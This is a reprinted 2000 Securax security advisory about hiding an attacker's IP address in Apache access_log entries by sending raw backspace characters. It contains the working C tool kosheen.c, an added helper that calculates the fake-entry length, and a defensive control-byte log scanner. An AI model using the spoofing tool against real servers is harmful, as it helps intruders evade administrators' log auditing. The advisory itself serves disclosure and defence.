
scx-sa-12.txt

31 Dec 2000 00:00:00. Reported by Incubus. Type: packetstorm. Source: packetstormsecurity.com

Backspace characters (0x08) sent as part of an HTTP request are written verbatim into Apache's access_log; when the file is viewed with cat or tail, the terminal acts on them and the attacker's IP address and request appear overwritten by text of the attacker's choosing, although the file itself still holds the real entry.

Code
`=============================================================================  
Securax-SA-12 Security Advisory  
belgian.networking.security Dutch  
=============================================================================  
Topic: Remote hiding from access_log and error_log  
Announced: 2000-12-28  
Affects: Logfile auditing with tools that print the contents of the  
file to the screen.  
=============================================================================  
  
  
Note: This entire advisory is based on trial-and-error results. We  
cannot guarantee that the information below is 100% correct. This document  
is subject to change without prior notice.  
  
If you happen to find more information, solutions, ... about the problem  
below or further variants, please contact me at the following e-mail address,  
[email protected], or contact the Securax crew by e-mail at  
[email protected].  
  
  
I. Problem Description  
-----------------------  
  
When backspace characters are sent after a NUL-terminated request, we still  
get an answer (the page we requested), but our entry in the access_log file  
is altered: the 0x08 bytes are written into the log verbatim, and whatever  
follows them is drawn over our IP address when someone cats the logfile to  
the screen, or maybe also to a device (such as /dev/lp0), although this  
cat-to-devices thing has not been tested by me, but will anyone ever print  
their entire access_log? I don't think so.  
  
So this only works when a site administrator checks the logs with 'cat' or  
'tail' or similar tools, often in combination with grep; the file itself  
still contains the real entry.  
  
  
Example  
-------  
  
1.)  
[incubus:~]$ nc 10.0.0.4 80  
GET /index.php HTTP/1.0  
<html>  
<head>  
...  
content (output) of index.php  
...  
[incubus:~]$  
  
2.)   
[incubus:~]$ ./localghost 10.0.0.4 index.php  
<html>  
<head>  
...  
content (output) of index.php  
...  
[incubus:~]$  
  
  
Hmm.. not very interesting eh? Well, let's take a look at the webserver's  
side:  
  
  
1.)   
[root@test logs]# tail -n 1 access_log  
10.0.0.2 - - [27/Dec/2000:04:42:26 +0100] "GET /index.php HTTP/1.0" 200 2362  
/* 10.0.0.2 is the IP of the attacker */  
  
2.)  
[root@test logs]# tail -n 1 access_log  
31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] "GET /index.htm HTTP/1.1" 200 2362   
  
  
Unfortunately, if you open access_log in any decent editor, it will notice  
the '\x08' chars (\x08 == backspace) and display them as dots (or ^H)  
instead of acting on them, so the real entry is still there for anyone who  
looks at the bytes.  
  
If you want to display a fake IP address, you have to calculate the length  
of the entry in the log file: the fake text must be as long as everything  
it is drawn over (your IP, the two '-' fields, the bracketed timestamp and  
the quoted request line up to your backspaces), otherwise characters from  
the end of the real entry remain visible after it. Sending more backspaces  
than needed does no harm, because the cursor stops at the start of the line.  
I suggest you keep the fake IP address as *real* as can be, because 31.3.3.7  
is more suspicious than, let's say, 207.46.230.229.  
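To make the length calculation concrete, the following is an added example in C; it is not part of the advisory or of kosheen.c. It builds the request line with the backspaces, writes the Common Log Format entry the way the Apache 1.3.14 in the advisory wrote it (the request copied verbatim, control characters included), and then renders that entry the way a dumb terminal does when the file is cat'ed. The IP addresses, timestamps, status and size are constructed to match the advisory's own example; the 26-character timestamp width is the Common Log Format default and is assumed to be known to the attacker.

```c
#include <stdio.h>
#include <string.h>

#define BS '\x08'

/* Characters Apache writes before the request line in Common Log Format,
 * "<ip> - - [<26-char timestamp>] \"", plus the request line itself.
 * The attacker knows every one of these lengths in advance. */
size_t clf_cover_len(const char *ip, const char *request)
{
    return strlen(ip) + strlen(" - - [") + 26 + strlen("] \"") + strlen(request);
}

/* The request line that gets sent: the real request, then n_bs backspaces,
 * then the fake text. Returns the length, or -1 if it does not fit. */
int build_request(const char *path, size_t n_bs, const char *fake,
                  char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "GET /%s HTTP/1.0", path);
    if (n < 0 || (size_t)n + n_bs + strlen(fake) + 1 > outsz) return -1;
    memset(out + n, BS, n_bs);
    strcpy(out + n + n_bs, fake);
    return (int)(n + n_bs + strlen(fake));
}

/* The access_log entry as the old Apache wrote it: the request line goes
 * into the file verbatim, control characters and all. */
int clf_line(const char *ip, const char *ts, const char *request,
             int status, long bytes, char *out, size_t outsz)
{
    return snprintf(out, outsz, "%s - - [%s] \"%s\" %d %ld",
                    ip, ts, request, status, bytes);
}

/* A dumb terminal: printable bytes are drawn at the cursor and overwrite
 * whatever is there; BS moves the cursor one column left (never past
 * column 0) and erases nothing. Returns the number of visible characters. */
size_t render_terminal(const char *raw, char *screen, size_t screensz)
{
    size_t cur = 0, end = 0;
    for (const unsigned char *p = (const unsigned char *)raw; *p; p++) {
        if (*p == (unsigned char)BS) { if (cur > 0) cur--; continue; }
        if (cur + 1 >= screensz) break;
        screen[cur++] = (char)*p;
        if (cur > end) end = cur;
    }
    screen[end] = '\0';
    return end;
}

/* Whole scenario: send the crafted request, log it with status 200 and
 * 2362 bytes (constructed values), cat the file. Returns 1 when the file
 * still starts with the real IP *and* the screen shows expected_screen. */
int scenario_shows(const char *ip, const char *ts, const char *path,
                   size_t n_bs, const char *fake, const char *expected_screen)
{
    char req[1024], raw[2048], screen[2048];
    if (build_request(path, n_bs, fake, req, sizeof req) < 0) return 0;
    if (clf_line(ip, ts, req, 200, 2362, raw, sizeof raw) < 0) return 0;
    render_terminal(raw, screen, sizeof screen);
    return strncmp(raw, ip, strlen(ip)) == 0 && strcmp(screen, expected_screen) == 0;
}

int main(void)
{
    /* Constructed sample values matching the advisory's example. */
    const char *ip = "10.0.0.2", *ts = "27/Dec/2000:04:42:26 +0100";
    const char *real_req = "GET /index.php HTTP/1.0";
    const char *fake = "31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] \"GET /index.htm HTTP/1.1";
    char req[1024], raw[2048], screen[2048];

    size_t cover = clf_cover_len(ip, real_req);      /* 66 for this entry */
    build_request("index.php", cover, fake, req, sizeof req);
    clf_line(ip, ts, req, 200, 2362, raw, sizeof raw);
    render_terminal(raw, screen, sizeof screen);
    printf("bytes in access_log : %zu (still begins with %s)\n", strlen(raw), ip);
    printf("what 'cat' shows    : %s\n", screen);
    return 0;
}
```

The picture on the screen is the same whether exactly 66 backspaces or kosheen.c's fixed 600 are sent, because the cursor stops at column 0; what has to match is the length of the fake text. A fake that ends after `"GET /` is 18 characters too short, and the `HTTP/1.0` of the real request reappears after the status and size, which is the kind of leftover an alert administrator notices.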
  
  
II. Impact  
----------  
  
  
This is not really a vulnerability, but it can be used in CGI scanners  
or something, I don't know. This source was coded and compiled on a  
Slackware 7 Linux (2.2.17) box and tested against an Apache 1.3.14 server.  
  
/* --| BOF |-- */  
  
/*  
kosheen.c - hides you from logfiles  
-----------------------------------  
"i'll hide you, away from danger"; -kosheen, 2000  
  
This will display false values in a remote site's access_log  
and error_log. Read Securax Advisory #12 for more info.  
(http://securax.org/pers/scx-sa-12.txt)  
  
Got the title of this source from the radio, and guess what song   
they were playing. :)  
  
All my love to Tessa.  
Maximum respect to vorlon, cicero, root-dude, lamagra, f0bic, Zoa,  
zymo, sentinel, woshy, bob, suPC, uptx, and all great ppl i forgot...  
  
by:  
incubus  
<[email protected]>  
*/  
  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define NUM_BACKSPACES 600 /* change the 600 if you are using quite large URLs */

int usage(char *progname);

int main(int argc, char **argv){
    int sock;
    ssize_t n;
    size_t len;
    char buf[4096]; /* change this value !! */
    struct sockaddr_in sin;
    struct hostent *he;

    if (argc < 3) usage(argv[0]);
    if ((he = gethostbyname(argv[1])) == NULL){
        fprintf(stderr, "Unknown host\n\n");
        exit(1);
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0){
        perror("socket() failed");
        exit(1);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr = *((struct in_addr *)he->h_addr);
    sin.sin_port = htons(80);

    /* Refuse a <page> that would not leave room for the backspaces, a fake
       entry and the CRLFs, instead of overflowing buf. */
    if (strlen(argv[2]) > sizeof(buf) - NUM_BACKSPACES - 512){
        fprintf(stderr, "<page> is too long for the %d byte buffer\n", (int)sizeof(buf));
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    strcpy(buf, "GET /");
    strcat(buf, argv[2]);
    strcat(buf, " HTTP/1.0");

    /* The backspaces are logged verbatim as part of the request line. When
       the log is cat'ed to a terminal they move the cursor back over the
       real entry and whatever follows them is drawn on top of it. */
    len = strlen(buf);
    memset(buf + len, '\x08', NUM_BACKSPACES);
    /*
    Uncomment next line (and change) if you want a fake address displayed
    strcat (buf,"31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] \"GET /index.htm HTTP/1.1");
    */
    strcat(buf, "\r\n\r\n");

    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0){
        perror("connect() failed");
        exit(1);
    }
    /* The whole buffer goes out, so the request is followed by the NUL
       padding of buf: this is the "NULL terminated request" of section I. */
    if (send(sock, buf, sizeof(buf), 0) < 0){
        perror("send() failed");
        exit(1);
    }
    /* Print the reply until the server closes the connection. */
    while ((n = recv(sock, buf, sizeof(buf) - 1, 0)) > 0){
        buf[n] = '\0';
        printf("%s", buf);
    }
    close(sock);
    return 0;
}

int usage(char *progname)
{
    fprintf (stderr, "\nHmm.. Better use it like this: \n");
    fprintf (stderr, "\t%s <server> <page>\n", progname);
    fprintf (stderr, "\tWhere: <server> is the hostname.\n\t ");
    fprintf (stderr, "<page> is the file you want.\n");
    fprintf (stderr, " by incubus\n <[email protected]>\n");
    exit(1);
}
  
/* --| EOF |-- */  
  
  
III. Possible workarounds  
-------------------------  
  
- Don't use 'cat' and 'tail' (and similar tools) for logfile checking, but  
a good editor, or a viewer that shows control characters instead of passing  
them to the terminal ('less' displays a backspace as ^H, and so does  
'cat -v').  
- Any access_log line containing bytes below 0x20 (other than the line  
terminator) or 0x7f has been tampered with and deserves a closer look; a  
real browser never puts such bytes in a request line.  
- Later Apache releases escape non-printable bytes in log entries as \xHH  
sequences instead of writing them raw, so this trick depends on the logging  
behaviour of the Apache 1.3.14 tested here.  
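As an added example (not from the advisory or from Securax), the check an administrator can run instead of trusting what 'cat' shows: a small C filter that rewrites every control byte in a log line as \xHH, in the same spirit as the escaping later Apache releases apply before logging, and counts the lines that contained any. The sample log lines are constructed; the third one carries five raw backspaces followed by a fake entry, as kosheen.c would produce.

```c
#include <stdio.h>
#include <string.h>

/* Copy one log line to out, rewriting every byte a terminal would act on
 * (anything below 0x20 except the line terminator, and 0x7f) as \xHH and
 * doubling backslashes so escaped and literal text cannot be confused.
 * Returns the number of control bytes found, or -1 if out is too small. */
int escape_log_line(const char *in, char *out, size_t outsz)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;
    int found = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        if (*p == '\\') {
            if (o + 2 >= outsz) return -1;
            out[o++] = '\\'; out[o++] = '\\';
        } else if ((*p < 0x20 && *p != '\n') || *p == 0x7f) {
            if (o + 4 >= outsz) return -1;
            out[o++] = '\\'; out[o++] = 'x';
            out[o++] = hex[*p >> 4]; out[o++] = hex[*p & 0x0f];
            found++;
        } else {
            if (o + 1 >= outsz) return -1;
            out[o++] = (char)*p;
        }
    }
    out[o] = '\0';
    return found;
}

/* Number of control bytes in a line (-1 if the line is absurdly long). */
int control_bytes(const char *in)
{
    char buf[4096];
    return escape_log_line(in, buf, sizeof buf);
}

/* 1 if the escaped form of in equals expected, else 0. */
int escapes_to(const char *in, const char *expected)
{
    char buf[4096];
    return escape_log_line(in, buf, sizeof buf) >= 0 && strcmp(buf, expected) == 0;
}

/* Scan an array of log lines; returns how many contain control bytes and,
 * when print is set, shows each suspicious line escaped so the operator
 * sees the real entry and not the terminal's rendering of it. */
int scan_log(const char *const *lines, size_t n, int print)
{
    char esc[4096];
    int suspicious = 0;
    for (size_t i = 0; i < n; i++) {
        int c = escape_log_line(lines[i], esc, sizeof esc);
        if (c > 0) {
            suspicious++;
            if (print) printf("line %zu: %d control byte(s): %s\n", i + 1, c, esc);
        }
    }
    return suspicious;
}

/* Constructed sample log: two honest entries and one carrying backspaces. */
static const char *const SAMPLE_LOG[] = {
    "10.0.0.2 - - [27/Dec/2000:04:42:26 +0100] \"GET /index.php HTTP/1.0\" 200 2362",
    "10.0.0.5 - - [27/Dec/2000:04:43:01 +0100] \"GET /robots.txt HTTP/1.0\" 404 207",
    "10.0.0.2 - - [27/Dec/2000:04:44:10 +0100] \"GET /index.php HTTP/1.0\b\b\b\b\b"
        "31.3.3.7 - - [31/Feb/1492:01:23:45 +3133] \"GET /index.htm HTTP/1.1\" 200 2362",
};
#define SAMPLE_LOG_N (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

int sample_suspicious_lines(void) { return scan_log(SAMPLE_LOG, SAMPLE_LOG_N, 0); }

int main(void)
{
    int n = scan_log(SAMPLE_LOG, SAMPLE_LOG_N, 1);
    printf("%d of %zu lines contain control bytes\n", n, (size_t)SAMPLE_LOG_N);
    return 0;
}
```

Run over a real file, this is the same test that `grep` for bytes below 0x20 performs, but with the offending line shown in a form that cannot lie to the terminal; the escaped output is also what a log-shipping pipeline should store, since downstream viewers are no safer than cat.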
  
IV. Credits  
-----------  
As mentioned in the .c file:   
Tessa, vorlon, cicero, zoa, F_F, rootdude, t-omicr0n, toshywoshy, segfault,   
f0bic, lamagra, steven, zymot1c, sentinel, [--bob--], alien, axxess, telar,  
prizm, {} and devilish.  
  
Also greets to the many, many people i forgot to mention.  
  
hmm.. kinda thanks to the people of kosheen for the name. :)  
  
incubus ([email protected]).  
  
============================================================================  
For more information [email protected]  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
----------------------------------------------------------------------------  
  
`
